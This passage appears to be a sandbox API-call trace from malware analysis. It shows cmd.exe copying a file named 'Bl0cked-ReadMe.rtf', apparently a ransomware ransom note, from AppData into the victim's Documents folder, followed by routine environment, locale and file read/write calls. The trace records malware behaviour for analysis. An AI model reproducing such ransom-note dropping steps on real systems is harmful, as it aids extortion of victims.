lpData=0x1ee8e8*=0x9, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.053] RegCloseKey (hKey=0x40) returned 0x0 [0142.053] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0142.053] srand (_Seed=0x5b886370) [0142.053] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0142.053] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0142.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 
0x18 [0142.053] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2318c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0142.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.054] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.054] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.054] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.054] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.054] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.054] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.054] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.054] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.054] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.054] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.054] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.054] GetEnvironmentStringsW () returned 0x2322b8* [0142.054] FreeEnvironmentStringsW (penv=0x2322b8) returned 1 [0142.054] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.054] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.054] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.054] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.054] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0142.054] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.054] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.054] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.054] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.054] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef6a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.055] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef6a8, lpFilePart=0x1ef6a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef6a4*="Desktop") returned 0x18 [0142.055] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.055] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef424 | out: lpFindFileData=0x1ef424) returned 0x22fff8 [0142.055] FindClose (in: hFindFile=0x22fff8 | out: hFindFile=0x22fff8) returned 1 [0142.055] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef424 | out: lpFindFileData=0x1ef424) returned 0x22fff8 [0142.055] FindClose (in: hFindFile=0x22fff8 | out: hFindFile=0x22fff8) returned 1 [0142.055] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef424 | out: lpFindFileData=0x1ef424) returned 0x22fff8 [0142.055] FindClose (in: hFindFile=0x22fff8 | out: hFindFile=0x22fff8) returned 1 [0142.055] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.055] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0142.056] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0142.056] GetEnvironmentStringsW () returned 0x232ad8* [0142.056] FreeEnvironmentStringsW (penv=0x232ad8) 
returned 1 [0142.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.056] GetConsoleOutputCP () returned 0x1b5 [0142.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.057] GetUserDefaultLCID () returned 0x409 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef7e8, cchData=128 | out: lpLCData="0") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef7e8, cchData=128 | out: lpLCData="0") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef7e8, cchData=128 | out: lpLCData="1") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0142.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0142.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0142.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.059] GetConsoleTitleW (in: lpConsoleTitle=0x2208d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.060] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.060] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.060] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.061] _wcsicmp (_String1="type", _String2=")") returned 75 [0142.061] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0142.061] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0142.061] _wcsicmp (_String1="IF", _String2="type") returned -11 [0142.061] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0142.061] _wcsicmp (_String1="REM", _String2="type") returned -2 [0142.061] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0142.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.065] GetFileType (hFile=0x7) returned 0x2 [0142.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef6e0 | out: lpMode=0x1ef6e0) returned 1 [0142.069] _dup (_FileHandle=1) returned 3 [0142.069] _close (_FileHandle=1) returned 0 [0142.070] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.070] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef6b0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x4c [0142.071] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.071] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.072] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.072] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.072] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.072] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.073] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef044, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef044) returned 0x220e50 [0142.073] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.073] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.073] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.073] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1edf50, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.073] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.073] GetFileType (hFile=0x54) returned 0x1 [0142.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.073] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1edfa8 | out: lpFileSizeHigh=0x1edfa8*=0x0) returned 0x1632 [0142.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.073] SetFilePointer (in: hFile=0x54, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.074] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.074] GetFileType (hFile=0x4c) returned 0x1 [0142.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.074] GetFileType (hFile=0x4c) returned 0x1 [0142.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.074] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] GetFileType (hFile=0x4c) returned 0x1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] GetFileType (hFile=0x4c) returned 0x1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.075] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, 
lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.076] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.078] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] GetFileType (hFile=0x4c) returned 0x1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] GetFileType (hFile=0x4c) returned 0x1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] GetFileType (hFile=0x4c) returned 0x1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.330] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.330] GetFileType (hFile=0x4c) returned 0x1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] GetFileType (hFile=0x4c) returned 0x1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=4) returned 0x54 
[0142.331] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.331] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, 
lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.332] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.332] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] 
